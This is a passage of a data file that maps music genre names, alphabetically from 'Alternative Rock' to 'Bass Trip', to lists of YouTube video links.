"Alternative Rock":["https://youtube.com/watch?v=WrnauRHpY40", "https://youtube.com/watch?v=cOjYAFS24gc", "https://youtube.com/watch?v=HPtMNclW1R4", "https://youtube.com/watch?v=jMlNTvyHzvA", "https://youtube.com/watch?v=6Vugt2F__no", "https://youtube.com/watch?v=wY_X09KW57M", "https://youtube.com/watch?v=pr_5X3uv2qc", "https://youtube.com/watch?v=BCZ88nRe9x0", "https://youtube.com/watch?v=_8XhfP_9LjY", "https://youtube.com/watch?v=UKVB3AtTSWg"],
"Alternative Roots Rock":["https://youtube.com/watch?v=OQYmGg3mKHg", "https://youtube.com/watch?v=MJB5L9F05tc", "https://youtube.com/watch?v=LocsoSgQ6p8", "https://youtube.com/watch?v=3FqiP-Grh2o", "https://youtube.com/watch?v=2jN1bqGr3ZY", "https://youtube.com/watch?v=UyFKi2bSZhE", "https://youtube.com/watch?v=MUpQkaZJWA8", "https://youtube.com/watch?v=P4ink55G5t8", "https://youtube.com/watch?v=QlT7NNABfCo", "https://youtube.com/watch?v=IgUrd2wX2Ds"],
"Ambeat":["https://youtube.com/watch?v=FhXFs5KawIs", "https://youtube.com/watch?v=ZSOD5hwhnR4", "https://youtube.com/watch?v=1krMBh4c9aY", "https://youtube.com/watch?v=R4nAvDXpvHk", "https://youtube.com/watch?v=-mOyxXf2WbE", "https://youtube.com/watch?v=HmhpAlWsxdY", "https://youtube.com/watch?v=3Z4FapBy79Q", "https://youtube.com/watch?v=Ch9lgX2FskA", "https://youtube.com/watch?v=D_YtbfeBZOE", "https://youtube.com/watch?v=wIsapgLOOUQ"],
"Ambient":["https://youtube.com/watch?v=sjkrrmBnpGE", "https://youtube.com/watch?v=DRFHklnN-SM", "https://youtube.com/watch?v=n0svuurLibQ", "https://youtube.com/watch?v=cfCWM8XXfpQ", "https://youtube.com/watch?v=xl0NMRAnqbA", "https://youtube.com/watch?v=tzmsyg4-rBQ", "https://youtube.com/watch?v=_anz8WrpDe0", "https://youtube.com/watch?v=BHl4NVytGpo", "https://youtube.com/watch?v=MgApT3VHtZY", "https://youtube.com/watch?v=c8FWj84ugv0"],
"Ambient Dub Techno":["https://youtube.com/watch?v=zBGVbVmxU_U", "https://youtube.com/watch?v=JrQLGtNeguk", "https://youtube.com/watch?v=TgolK02S4pM", "https://youtube.com/watch?v=b5d3ROLyciY", "https://youtube.com/watch?v=vTm-RYmwbRk", "https://youtube.com/watch?v=bKmQrrIjGYo", "https://youtube.com/watch?v=AFRZAL2SbIA", "https://youtube.com/watch?v=CJy9Van_FrI", "https://youtube.com/watch?v=zVt6wNCcT58", "https://youtube.com/watch?v=G6_AF8Autxo"],
"Ambient Fusion":["https://youtube.com/watch?v=aJURhQnAezU", "https://youtube.com/watch?v=Qf6hlfmSM8o", "https://youtube.com/watch?v=q29ZfPmopLE", "https://youtube.com/watch?v=KgJ-QZD9m40", "https://youtube.com/watch?v=oosRJxtLaDg", "https://youtube.com/watch?v=CdDk-MgDeko", "https://youtube.com/watch?v=7BdypCJdIBk", "https://youtube.com/watch?v=2v7DJXQ2pKo", "https://youtube.com/watch?v=Qw7vOfDLBiQ", "https://youtube.com/watch?v=yvsRrpIPCoE"],
"Ambient Idm":["https://youtube.com/watch?v=2om5_sNlez8", "https://youtube.com/watch?v=Ay7weD1BCN8", "https://youtube.com/watch?v=muuc3E1lNX0", "https://youtube.com/watch?v=xG802xAbc-8", "https://youtube.com/watch?v=4oxGHCb-De8", "https://youtube.com/watch?v=2v7DJXQ2pKo", "https://youtube.com/watch?v=TKwPp6XjKb0", "https://youtube.com/watch?v=BHl4NVytGpo", "https://youtube.com/watch?v=SQNPzLh_mTw", "https://youtube.com/watch?v=53X72H7fVQI"],
"Ambient Psychill":["https://youtube.com/watch?v=4TuY06d7ZBI", "https://youtube.com/watch?v=7UgLrh8_qE8", "https://youtube.com/watch?v=m1B_gPzgJXI", "https://youtube.com/watch?v=1NOzQsdh_t0", "https://youtube.com/watch?v=grWRSyptTnk", "https://youtube.com/watch?v=W1_1YqBuySk", "https://youtube.com/watch?v=ysc4p0kEd0E", "https://youtube.com/watch?v=38WDfmIOjg8", "https://youtube.com/watch?v=sCeEtztKeDk", "https://youtube.com/watch?v=VxV0pylTz44"],
"Ambient Trance":["https://youtube.com/watch?v=jcDBZ808roI", "https://youtube.com/watch?v=ysc4p0kEd0E", "https://youtube.com/watch?v=gcq9F5WODEA", "https://youtube.com/watch?v=K20PSCMfIoY", "https://youtube.com/watch?v=iXAbte4QXKs", "https://youtube.com/watch?v=X-db67TcKUw", "https://youtube.com/watch?v=cq2Ef6rvL6g", "https://youtube.com/watch?v=4TuY06d7ZBI", "https://youtube.com/watch?v=grWRSyptTnk", "https://youtube.com/watch?v=ylgXkUN6cQ0"],
"Anarcho-punk":["https://youtube.com/watch?v=oIL4maRJ3GE", "https://youtube.com/watch?v=RY37tBs4yJg", "https://youtube.com/watch?v=0j-hBGnjEvs", "https://youtube.com/watch?v=djv9hTWtvN0", "https://youtube.com/watch?v=dm_q9dtXOeU", "https://youtube.com/watch?v=dQogfROnkm4", "https://youtube.com/watch?v=k7TXf8NgKKs", "https://youtube.com/watch?v=zzuLAs-v6x8", "https://youtube.com/watch?v=vfgSHvgohTg", "https://youtube.com/watch?v=XE84pL0ZAys"],
"Andean":["https://youtube.com/watch?v=uzyYKAPcfmE", "https://youtube.com/watch?v=xCoUkpZUnc4", "https://youtube.com/watch?v=YV6hij9njw8", "https://youtube.com/watch?v=EMVHEjyjUTo", "https://youtube.com/watch?v=gslGyY7b6Dc", "https://youtube.com/watch?v=ZjCj_udzlIE", "https://youtube.com/watch?v=BCqgiu2SzoQ", "https://youtube.com/watch?v=_XtUIyavc8k", "https://youtube.com/watch?v=Vbz-3nWjdvA", "https://youtube.com/watch?v=D9GheduQZQo"],
"Anime":["https://youtube.com/watch?v=eWZA5N4IcNM", "https://youtube.com/watch?v=q4jYZIVlTlo", "https://youtube.com/watch?v=ppmRaENWRCw", "https://youtube.com/watch?v=W42ybAGIiuk", "https://youtube.com/watch?v=zQGQLEE1nQs", "https://youtube.com/watch?v=iPEX5w0Ok20", "https://youtube.com/watch?v=pCooCisSI3I", "https://youtube.com/watch?v=hjQGwlpdPaU", "https://youtube.com/watch?v=WCzRnVYatts", "https://youtube.com/watch?v=xMNfE84YYyw"],
"Anime Score":["https://youtube.com/watch?v=LAjiTn5t78U", "https://youtube.com/watch?v=pVddPNSzjZI", "https://youtube.com/watch?v=EI8bCjIkhpo", "https://youtube.com/watch?v=opt6W_fbE0U", "https://youtube.com/watch?v=-MUzLXHEWVo", "https://youtube.com/watch?v=Dz8edCrKGgU", "https://youtube.com/watch?v=Yz19qzup1oU", "https://youtube.com/watch?v=WGp9PVY48MM", "https://youtube.com/watch?v=5GFw2-qGGTE", "https://youtube.com/watch?v=uXcPKBVewvI"],
"Anti-folk":["https://youtube.com/watch?v=jfeVwm5ui-s", "https://youtube.com/watch?v=3qK4Aq8m_xA", "https://youtube.com/watch?v=fnmrAthgi8g", "https://youtube.com/watch?v=WUeq_KzjF1s", "https://youtube.com/watch?v=_Ce9YbmKDU0", "https://youtube.com/watch?v=zR_hzUu2glU", "https://youtube.com/watch?v=a5mDr04G-As", "https://youtube.com/watch?v=Kxl6QC9-s7k", "https://youtube.com/watch?v=fzeIS75OxoY", "https://youtube.com/watch?v=tuYpBekGISU"],
"Antiviral Pop":["https://youtube.com/watch?v=u4woidoVrOM", "https://youtube.com/watch?v=gamxKsaLbhs", "https://youtube.com/watch?v=XqN2qFvY64U", "https://youtube.com/watch?v=UOPId7bXqG4", "https://youtube.com/watch?v=wvz97-lNPH8", "https://youtube.com/watch?v=dqXEgN1Waoc", "https://youtube.com/watch?v=01Zp6bMKOaw", "https://youtube.com/watch?v=_kS7F4VpJa0", "https://youtube.com/watch?v=qiGs406nLw4", "https://youtube.com/watch?v=DCVsjE1oPo4"],
"Appalachian Folk":["https://youtube.com/watch?v=TeULeHtHBfw", "https://youtube.com/watch?v=R0j2o9DyI04", "https://youtube.com/watch?v=g4R936oEuH4", "https://youtube.com/watch?v=vnQA-A2ZvE8", "https://youtube.com/watch?v=HqDE_nPLvWA", "https://youtube.com/watch?v=Jci1IaxnqH8", "https://youtube.com/watch?v=OM-EX7c0Ovc", "https://youtube.com/watch?v=EVxjnXEEBnU", "https://youtube.com/watch?v=STzoTmbemvA", "https://youtube.com/watch?v=gRvbdptClKw"],
"Arab Folk":["https://youtube.com/watch?v=bkUYJImXlrQ", "https://youtube.com/watch?v=ppLl_sosdv8", "https://youtube.com/watch?v=tG4r6u2wtkg", "https://youtube.com/watch?v=kpJIt4_DW6U", "https://youtube.com/watch?v=Q_HoGYhk4x8", "https://youtube.com/watch?v=62tSUVOd-bM", "https://youtube.com/watch?v=lgPUxDdkdjk", "https://youtube.com/watch?v=4M8yAo3VkNc", "https://youtube.com/watch?v=zn-8v9n9Zu4", "https://youtube.com/watch?v=vTrr34licGQ"],
"Arab Pop":["https://youtube.com/watch?v=i7wveOu5hkQ", "https://youtube.com/watch?v=SMxsYk1hzgU", "https://youtube.com/watch?v=Zgz8ybG6l-U", "https://youtube.com/watch?v=R7ed-GUxY_M", "https://youtube.com/watch?v=QUBvVTNRp4Q", "https://youtube.com/watch?v=M5ZnpWQRqU0", "https://youtube.com/watch?v=1tEbNOlPgxc", "https://youtube.com/watch?v=0e0txlm7KUo", "https://youtube.com/watch?v=ZaOIAXHj0lA", "https://youtube.com/watch?v=pn2CIsPhL48"],
"Arabesk":["https://youtube.com/watch?v=AacykI39EFU", "https://youtube.com/watch?v=595IM8VH88Y", "https://youtube.com/watch?v=Amb7_Vi8qOw", "https://youtube.com/watch?v=ddJGgP8PIUY", "https://youtube.com/watch?v=4BpIECcDSx0", "https://youtube.com/watch?v=gYyfKOlRGI8", "https://youtube.com/watch?v=sTMZEfP4CYc", "https://youtube.com/watch?v=yTuUwioJoqY", "https://youtube.com/watch?v=sGZRX-QE6fQ", "https://youtube.com/watch?v=koyD9V-XnmE"],
"Argentine Indie":["https://youtube.com/watch?v=AS_x4uR87Kw", "https://youtube.com/watch?v=EpXIt_7uso8", "https://youtube.com/watch?v=XnUNOaxw6bs", "https://youtube.com/watch?v=9s-5tR0fGfM", "https://youtube.com/watch?v=kJrjIM9DiS8", "https://youtube.com/watch?v=4MG6rKuCfyo", "https://youtube.com/watch?v=6wKur11fXHc", "https://youtube.com/watch?v=Cj7OHYHwp50", "https://youtube.com/watch?v=wKbzmfkW8wc", "https://youtube.com/watch?v=DsXMR7dY35w"],
"Argentine Reggae":["https://youtube.com/watch?v=0QkHW7YfQjk", "https://youtube.com/watch?v=3LXr89pMU2Q", "https://youtube.com/watch?v=iGAkWI8q7Vg", "https://youtube.com/watch?v=csx53ZqoQqI", "https://youtube.com/watch?v=MJNHJvLbSmw", "https://youtube.com/watch?v=FlRl6J1oSRM", "https://youtube.com/watch?v=ocS3WmbwQXk", "https://youtube.com/watch?v=VMZKBBJTOvI", "https://youtube.com/watch?v=j-zIgUAaVOk", "https://youtube.com/watch?v=KoxlzZlILzI"],
"Argentine Rock":["https://youtube.com/watch?v=_aA14l32f64", "https://youtube.com/watch?v=pOlfx_nzmW0", "https://youtube.com/watch?v=-_H_BbtBawA", "https://youtube.com/watch?v=EpXIt_7uso8", "https://youtube.com/watch?v=T_FkEw27XJ0", "https://youtube.com/watch?v=UCF9oHXhDMU", "https://youtube.com/watch?v=D409yNLVS9I", "https://youtube.com/watch?v=z5d-9mYPXAc", "https://youtube.com/watch?v=gEPmA3USJdI", "https://youtube.com/watch?v=BP1Ksv35oek"],
"Armenian Folk":["https://youtube.com/watch?v=6Fmpl7LWPWg", "https://youtube.com/watch?v=DREOr-UbrJc", "https://youtube.com/watch?v=6HkOhKQkipQ", "https://youtube.com/watch?v=YRjxlU5EM_Y", "https://youtube.com/watch?v=y5tcbD5in7k", "https://youtube.com/watch?v=m8gSfA7OUkI", "https://youtube.com/watch?v=733EtpHBD_s", "https://youtube.com/watch?v=00Uw9kgZ4QM", "https://youtube.com/watch?v=2XLVTvlUKp4", "https://youtube.com/watch?v=Q13BMlWKZWU"],
"Art Rock":["https://youtube.com/watch?v=FdZvWACZzz0", "https://youtube.com/watch?v=GyoNufvLLf8", "https://youtube.com/watch?v=ECrRlqLJZa4", "https://youtube.com/watch?v=w3CZBR_kMvc", "https://youtube.com/watch?v=SRUnhcgsGSQ", "https://youtube.com/watch?v=B-ILHbxOQeI", "https://youtube.com/watch?v=G576d8zFk6M", "https://youtube.com/watch?v=Uzb9aUVPkTc", "https://youtube.com/watch?v=HxAdVeH5Fjw"],
"Athens Indie":["https://youtube.com/watch?v=vFreuxkxqnw", "https://youtube.com/watch?v=KtEEAcdKrAs", "https://youtube.com/watch?v=1Htt42VlYzY", "https://youtube.com/watch?v=3_qE6RrkgJA", "https://youtube.com/watch?v=E0K4T7WRB9I", "https://youtube.com/watch?v=xDcGl8tZhrs", "https://youtube.com/watch?v=liM9LaSo3Tw", "https://youtube.com/watch?v=mh0yXYQ-_1g", "https://youtube.com/watch?v=Xl2strJuKiw", "https://youtube.com/watch?v=1PH731VhI2U"],
"Atmospheric Black Metal":["https://youtube.com/watch?v=0pioXAxW8EM", "https://youtube.com/watch?v=c6wzijeiClA", "https://youtube.com/watch?v=xq7-vvcUK-U", "https://youtube.com/watch?v=4EtK6nAkuMQ", "https://youtube.com/watch?v=CZQ_W2B_7wM", "https://youtube.com/watch?v=JoI_Bt8TD-I", "https://youtube.com/watch?v=-IBIP9asAGw", "https://youtube.com/watch?v=I-pXvKlkiMs", "https://youtube.com/watch?v=OT6nsCJx-yY", "https://youtube.com/watch?v=kbj3DlT4JpQ"],
"Atmospheric Post Rock":["https://youtube.com/watch?v=tahrfXE1es8", "https://youtube.com/watch?v=QDWbDmwS3TM", "https://youtube.com/watch?v=Xqrpfd2B-6I", "https://youtube.com/watch?v=ZpCluchEflg", "https://youtube.com/watch?v=tRUjv98QFAI", "https://youtube.com/watch?v=Z1TyFA1hxTI", "https://youtube.com/watch?v=Q57yv7t5Sa8", "https://youtube.com/watch?v=iC_SvgjAn5I", "https://youtube.com/watch?v=uItmq5q1QL0", "https://youtube.com/watch?v=GhrX0JCeh00"],
"Atmospheric Post-metal":["https://youtube.com/watch?v=QDWbDmwS3TM", "https://youtube.com/watch?v=OT6nsCJx-yY", "https://youtube.com/watch?v=Y71Ik5oT414", "https://youtube.com/watch?v=tahrfXE1es8", "https://youtube.com/watch?v=5xCX0EkAhKo", "https://youtube.com/watch?v=R1Wec2KZszQ", "https://youtube.com/watch?v=i10cC8sH1To", "https://youtube.com/watch?v=Ua-jUGXW1BM", "https://youtube.com/watch?v=zgf34kvavRo", "https://youtube.com/watch?v=0pioXAxW8EM"],
"Aussietronica":["https://youtube.com/watch?v=LGmeXWeC9xQ", "https://youtube.com/watch?v=6WwXjbVcBX4", "https://youtube.com/watch?v=tgyZrz4ffKE", "https://youtube.com/watch?v=bmuG7qV3qAI", "https://youtube.com/watch?v=isNI0Rimw0k", "https://youtube.com/watch?v=NQW5d1q0aWs", "https://youtube.com/watch?v=nYOVPiQQ2NQ", "https://youtube.com/watch?v=sxGVn1e4mzo", "https://youtube.com/watch?v=QhlBjRUYuQo", "https://youtube.com/watch?v=f6SXsFopQ8A"],
"Austindie":["https://youtube.com/watch?v=PZ2ThvZC_fs", "https://youtube.com/watch?v=gTGsxSfy_Ck", "https://youtube.com/watch?v=dn0nfrBAJMc", "https://youtube.com/watch?v=czVQuOvGO-c", "https://youtube.com/watch?v=3LIImh4INeA", "https://youtube.com/watch?v=I21bhn5-lm0", "https://youtube.com/watch?v=BHPKUvzjLbw", "https://youtube.com/watch?v=sSiteLCkVDM", "https://youtube.com/watch?v=7uWVTx5nTLU", "https://youtube.com/watch?v=r0X6HlF9v1g"],
"Australian Alternative Rock":["https://youtube.com/watch?v=fi_AAtvklsU", "https://youtube.com/watch?v=9VptBVvVMz4", "https://youtube.com/watch?v=FFFzBHwnfCk", "https://youtube.com/watch?v=j58V2vC9EPc", "https://youtube.com/watch?v=dYbJ4BshEsg", "https://youtube.com/watch?v=TETVNH3k8Ag", "https://youtube.com/watch?v=aiYpDDHKy18"],
"Australian Country":["https://youtube.com/watch?v=zmon5Tv6bYU", "https://youtube.com/watch?v=HRg1gJi6yqc", "https://youtube.com/watch?v=0-K8q5HcwsY", "https://youtube.com/watch?v=GdSbBdkdg04", "https://youtube.com/watch?v=mngOD_46iQY", "https://youtube.com/watch?v=gKiJdWJ3n4w", "https://youtube.com/watch?v=Fqmo46UJ_DM", "https://youtube.com/watch?v=FqtttbbYfSM", "https://youtube.com/watch?v=Utb4gruKItM", "https://youtube.com/watch?v=bQmzk05I3nw"],
"Australian Dance":["https://youtube.com/watch?v=HWcKwYsBAvI", "https://youtube.com/watch?v=atHRJiNji10", "https://youtube.com/watch?v=5yYMicbSf98", "https://youtube.com/watch?v=CAyGvoixx_g", "https://youtube.com/watch?v=r68q3jSdD5s", "https://youtube.com/watch?v=OhyKsEn6_So", "https://youtube.com/watch?v=FCBHQU9UVWA", "https://youtube.com/watch?v=qHqzjQty7aY", "https://youtube.com/watch?v=Yh7BnZwfsh4", "https://youtube.com/watch?v=yiKFYTFJ_kw"],
"Australian Hip Hop":["https://youtube.com/watch?v=aB16fJpoj-I", "https://youtube.com/watch?v=EFXZqyl8xKE", "https://youtube.com/watch?v=KJLX0sWukwo", "https://youtube.com/watch?v=fJxYP5_Ctg8", "https://youtube.com/watch?v=r34MG8b_Z3A", "https://youtube.com/watch?v=ilwlbJNcJTk", "https://youtube.com/watch?v=QpO6jmpjZDw", "https://youtube.com/watch?v=KXiaJiDbQPM", "https://youtube.com/watch?v=0ilWQwrkFE8", "https://youtube.com/watch?v=tfAcpGLWpHw"],
"Australian Indie":["https://youtube.com/watch?v=9VptBVvVMz4", "https://youtube.com/watch?v=dYbJ4BshEsg", "https://youtube.com/watch?v=icrTbtYLqUw", "https://youtube.com/watch?v=Krdt6FGuB3I", "https://youtube.com/watch?v=RvMliuVIUMw", "https://youtube.com/watch?v=aiYpDDHKy18", "https://youtube.com/watch?v=TETVNH3k8Ag", "https://youtube.com/watch?v=Cp-1t9B62zc", "https://youtube.com/watch?v=j58V2vC9EPc", "https://youtube.com/watch?v=5rqLNx8Lgj0"],
"Australian Pop":["https://youtube.com/watch?v=fi_AAtvklsU", "https://youtube.com/watch?v=XfR9iY5y94s", "https://youtube.com/watch?v=dYbJ4BshEsg", "https://youtube.com/watch?v=TETVNH3k8Ag", "https://youtube.com/watch?v=ejorQVy3m8E", "https://youtube.com/watch?v=1hpzRJCZ0oE", "https://youtube.com/watch?v=4ekrwWwL2Vw", "https://youtube.com/watch?v=gqlY2OWHnD4", "https://youtube.com/watch?v=nN-542IYoE0", "https://youtube.com/watch?v=pL_JvhfQjms"],
"Austrian Hip Hop":["https://youtube.com/watch?v=PMV3a8DM60c", "https://youtube.com/watch?v=RrUtuX4k9tw", "https://youtube.com/watch?v=14lQqDecueY", "https://youtube.com/watch?v=eSRSQt7wZsI", "https://youtube.com/watch?v=-bCFiT0TghI", "https://youtube.com/watch?v=j8TILMk59N8", "https://youtube.com/watch?v=CjxPjHYvmMs"],
"Austropop":["https://youtube.com/watch?v=LO0QmmnuKtQ", "https://youtube.com/watch?v=eP9m2k_5QKo", "https://youtube.com/watch?v=3OchUN1i8ZE", "https://youtube.com/watch?v=IpxF9VjUPz0", "https://youtube.com/watch?v=xw1mvOkULoU", "https://youtube.com/watch?v=aiDtKsgmwxE"],
"Avant-garde":["https://youtube.com/watch?v=tW05Y6sJIGo", "https://youtube.com/watch?v=x_0UnIyeZRQ", "https://youtube.com/watch?v=jRBbJXa5z0s", "https://youtube.com/watch?v=MpbZDxx44qE", "https://youtube.com/watch?v=0K4j3HBuenY", "https://youtube.com/watch?v=09pXOmUpO10", "https://youtube.com/watch?v=lwNkW-RQoSI", "https://youtube.com/watch?v=3xn2RfmunZ0", "https://youtube.com/watch?v=u0hQydmGdYA", "https://youtube.com/watch?v=JoeEVLB7l7g"],
"Avant-garde Jazz":["https://youtube.com/watch?v=Biy3fuspi6c", "https://youtube.com/watch?v=uipp8gd56gI", "https://youtube.com/watch?v=16AyCHjlF2c", "https://youtube.com/watch?v=sRs4Gnb1Pkk", "https://youtube.com/watch?v=zat_LcXuQ44", "https://youtube.com/watch?v=gcufx_7p5XQ", "https://youtube.com/watch?v=hqRYNuXbVcI", "https://youtube.com/watch?v=Qg2EScIrFPw", "https://youtube.com/watch?v=m8xsSAm0FMc", "https://youtube.com/watch?v=fXtqb_80G6c"],
"Avantgarde Metal":["https://youtube.com/watch?v=gcloAXITyxA", "https://youtube.com/watch?v=op37QTHOFhU", "https://youtube.com/watch?v=Ja7LA_BK_GE", "https://youtube.com/watch?v=PDFrm6BiFdQ", "https://youtube.com/watch?v=Jw-_5m6kf2s", "https://youtube.com/watch?v=YSvvPwHeYkQ", "https://youtube.com/watch?v=pZj_btg3F4s", "https://youtube.com/watch?v=pNv10Janq7M", "https://youtube.com/watch?v=QaBdjUuevig"],
"Axe":["https://youtube.com/watch?v=3z1_-346neI", "https://youtube.com/watch?v=530bqLZA97Y", "https://youtube.com/watch?v=hToZn7ap2t8", "https://youtube.com/watch?v=liFS1jJQp90", "https://youtube.com/watch?v=dLgKXtkr-2w", "https://youtube.com/watch?v=45KWSWqMbDk", "https://youtube.com/watch?v=MegJub0hOmc", "https://youtube.com/watch?v=fMIWsRvHiZY", "https://youtube.com/watch?v=D6Xb13SsOjo", "https://youtube.com/watch?v=dJhtDEuTvqo"],
"Azonto":["https://youtube.com/watch?v=NexP3uRDaDI", "https://youtube.com/watch?v=3q_ralziDS4", "https://youtube.com/watch?v=kfcKzQg9IxU", "https://youtube.com/watch?v=VetNdbu-ZNc", "https://youtube.com/watch?v=Abfb574bcPc", "https://youtube.com/watch?v=uYuBJtMJIKU", "https://youtube.com/watch?v=GTUIlOudlHI", "https://youtube.com/watch?v=7hb-yqY7IPQ", "https://youtube.com/watch?v=G9bha8KRCb0", "https://youtube.com/watch?v=6LCoksSQMzs"],
"Bachata":["https://youtube.com/watch?v=dsLjyLn859g", "https://youtube.com/watch?v=2T6YMokSM68", "https://youtube.com/watch?v=6N9dEF0oHQg", "https://youtube.com/watch?v=K28blPLM85c", "https://youtube.com/watch?v=kVtfXd_WdkA", "https://youtube.com/watch?v=QFs3PIZb3js", "https://youtube.com/watch?v=7WDyYpzVp48", "https://youtube.com/watch?v=5i8BqmPNS-k", "https://youtube.com/watch?v=iTIt_OpFJa0", "https://youtube.com/watch?v=E97LkuHXwYI"],
"Baile Funk":["https://youtube.com/watch?v=iaXt5shHFL8", "https://youtube.com/watch?v=4sypNlWRu9c", "https://youtube.com/watch?v=t7MP78XjSZI", "https://youtube.com/watch?v=KRnAIONPDuM", "https://youtube.com/watch?v=QamobTUEVH8", "https://youtube.com/watch?v=rhus-g6LqRw", "https://youtube.com/watch?v=8I5lBWl3MPc", "https://youtube.com/watch?v=paTzd_gZgQ8", "https://youtube.com/watch?v=M3zW9RWY6Wk", "https://youtube.com/watch?v=7DQdiJzoRMc"],
"Balearic":["https://youtube.com/watch?v=_9e_-nkGAHc", "https://youtube.com/watch?v=BVLexA3kiOw", "https://youtube.com/watch?v=PUMkA0-n1F0", "https://youtube.com/watch?v=ixT0pbCGgi4", "https://youtube.com/watch?v=Mx4IWFDOmnU", "https://youtube.com/watch?v=YVG2X0leYMs", "https://youtube.com/watch?v=9HmrfY0Eq6M", "https://youtube.com/watch?v=Mcj6DhfPmCY", "https://youtube.com/watch?v=P4XhMMS2Bk4", "https://youtube.com/watch?v=gQ2hkD1lSEk"],
"Balkan Brass":["https://youtube.com/watch?v=ywKxLSPL6sg", "https://youtube.com/watch?v=vuTBTAaFG4k", "https://youtube.com/watch?v=1CM4ivhkXag", "https://youtube.com/watch?v=NhmauovUjv0", "https://youtube.com/watch?v=8R6lEytvMLo", "https://youtube.com/watch?v=2mHFjJszcpU", "https://youtube.com/watch?v=RrPWV6wliks", "https://youtube.com/watch?v=SWo-AUmiIxc", "https://youtube.com/watch?v=xJrICIYQ0R4", "https://youtube.com/watch?v=lN5EAPklVwI"],
"Banda":["https://youtube.com/watch?v=4NJlUribp3c", "https://youtube.com/watch?v=Kr0Ev1mfeMg", "https://youtube.com/watch?v=kHwVNT4VTQ8", "https://youtube.com/watch?v=x9nrEccsivA", "https://youtube.com/watch?v=ymTG5W_7Q9E", "https://youtube.com/watch?v=OywHhwNIVIU", "https://youtube.com/watch?v=9mthODRpngs", "https://youtube.com/watch?v=mNeVoEKwuwk", "https://youtube.com/watch?v=cVlAmP-KDT4", "https://youtube.com/watch?v=CdMmWLBncK8"],
"Bangla":["https://youtube.com/watch?v=UYX5EHvzUqg", "https://youtube.com/watch?v=pnHY04QDFbA", "https://youtube.com/watch?v=8aApFBmEJV0", "https://youtube.com/watch?v=TdWBuzfcRs8", "https://youtube.com/watch?v=o7ejrqRN6_0", "https://youtube.com/watch?v=NctrF4URC54", "https://youtube.com/watch?v=3_L_Ded0oPU", "https://youtube.com/watch?v=4twlRmEPJVA", "https://youtube.com/watch?v=ey_P7wQan7w", "https://youtube.com/watch?v=oCAj84fs1bA"],
"Barbershop":["https://youtube.com/watch?v=KUr0pqEwOlU", "https://youtube.com/watch?v=uBXycVLybjY", "https://youtube.com/watch?v=Bu9Ia0n95rM", "https://youtube.com/watch?v=tyi_2Og8QJA", "https://youtube.com/watch?v=1wjPpaCavRY", "https://youtube.com/watch?v=btY1rp5w1zs", "https://youtube.com/watch?v=BCSMaKWzz8Q", "https://youtube.com/watch?v=8PYMJq53Bbo", "https://youtube.com/watch?v=IUDTlvagjJA", "https://youtube.com/watch?v=R_jGuoJBEhw"],
"Barnemusikk":["https://youtube.com/watch?v=vZsGQQPwOrU", "https://youtube.com/watch?v=KO0TSn-PRNU", "https://youtube.com/watch?v=StRwGlQadDU", "https://youtube.com/watch?v=NTbvb9M9XiA", "https://youtube.com/watch?v=1Dhp6gbZgF4", "https://youtube.com/watch?v=ri5_fzndMBg", "https://youtube.com/watch?v=nKyRT4bV02Q", "https://youtube.com/watch?v=tJZXpKNa7ds", "https://youtube.com/watch?v=aKc33_QYFb4", "https://youtube.com/watch?v=O7DBJtxazcE"],
"Barnmusik":["https://youtube.com/watch?v=ww6jn_bW7tU", "https://youtube.com/watch?v=MNWxe8yD6Mg", "https://youtube.com/watch?v=LTKJpHHTfDQ", "https://youtube.com/watch?v=GKZAhaopZJA", "https://youtube.com/watch?v=7jgCImUfJN4", "https://youtube.com/watch?v=oa5zlh8zTeA", "https://youtube.com/watch?v=99o7p8tODUI", "https://youtube.com/watch?v=uw_BN7A39Go", "https://youtube.com/watch?v=B-RR9wsa12Q", "https://youtube.com/watch?v=9AKpLkKGKWM"],
"Baroque":["https://youtube.com/watch?v=CuU9q2VKOyc", "https://youtube.com/watch?v=BjnnUCmNREI", "https://youtube.com/watch?v=Oefai-dt4hM", "https://youtube.com/watch?v=-fcqvrpelXI", "https://youtube.com/watch?v=2gO1v2GPMFk", "https://youtube.com/watch?v=9V5rXZWdH3Y", "https://youtube.com/watch?v=UFXhwgY7mug", "https://youtube.com/watch?v=2xqt59TcoK8", "https://youtube.com/watch?v=Rhc5jXWu55c", "https://youtube.com/watch?v=cJSG51HyVOg"],
"Baroque Ensemble":["https://youtube.com/watch?v=uw2dlZ8V4-0", "https://youtube.com/watch?v=oPJX221j3Fk", "https://youtube.com/watch?v=VVivtti-n-w", "https://youtube.com/watch?v=CuU9q2VKOyc", "https://youtube.com/watch?v=w26Qkm4wbGk", "https://youtube.com/watch?v=0GWPVUpc5_k", "https://youtube.com/watch?v=Kl6R4Ui9blc", "https://youtube.com/watch?v=BnjqGhAlFzs", "https://youtube.com/watch?v=c4DpYgG3FyM", "https://youtube.com/watch?v=PX0xC6x2yxk"],
"Basque Rock":["https://youtube.com/watch?v=f0Qu6dOTI-I", "https://youtube.com/watch?v=9Rhv-Tvq5Lo", "https://youtube.com/watch?v=6i924wVeSMM", "https://youtube.com/watch?v=ONsp-SMT6is", "https://youtube.com/watch?v=_uBI6H7_9IE", "https://youtube.com/watch?v=CFQ_gcNHu7c", "https://youtube.com/watch?v=FdOGt93yBFQ", "https://youtube.com/watch?v=32ftw9rZ4SY", "https://youtube.com/watch?v=ykvkyNdqRCI", "https://youtube.com/watch?v=XXiRbMBk8uI"],
"Bass Music":["https://youtube.com/watch?v=YcTCIMKeiNQ", "https://youtube.com/watch?v=3NqogYB1bjI", "https://youtube.com/watch?v=iM48VDuPRQk", "https://youtube.com/watch?v=_bWCHueljcc", "https://youtube.com/watch?v=kAzIcDmFp1o", "https://youtube.com/watch?v=4vUtXdXmnRE", "https://youtube.com/watch?v=pemXaSl4n28", "https://youtube.com/watch?v=ycBBygx299Q", "https://youtube.com/watch?v=oLWBhZruofc", "https://youtube.com/watch?v=SYhvpeWXQH4"],
"Bass Trip":["https://youtube.com/watch?v=7GuEzWAp5-E", "https://youtube.com/watch?v=FHVD9ft_ANw", "https://youtube.com/watch?v=FRfmAG1FoCs", "https://youtube.com/watch?v=pAvGsSI_cu8", "https://youtube.com/watch?v=yY7iGa4t9-I", "https://youtube.com/watch?v=_z3Djh5d3js", "https://youtube.com/watch?v=R2QGFnXiKTA", "https://youtube.com/watch?v=pu-I1qlsiXg", "https://youtube.com/watch?v=dUmIkc5903I", "https://youtube.com/watch?v=FQwR127R0yw"],
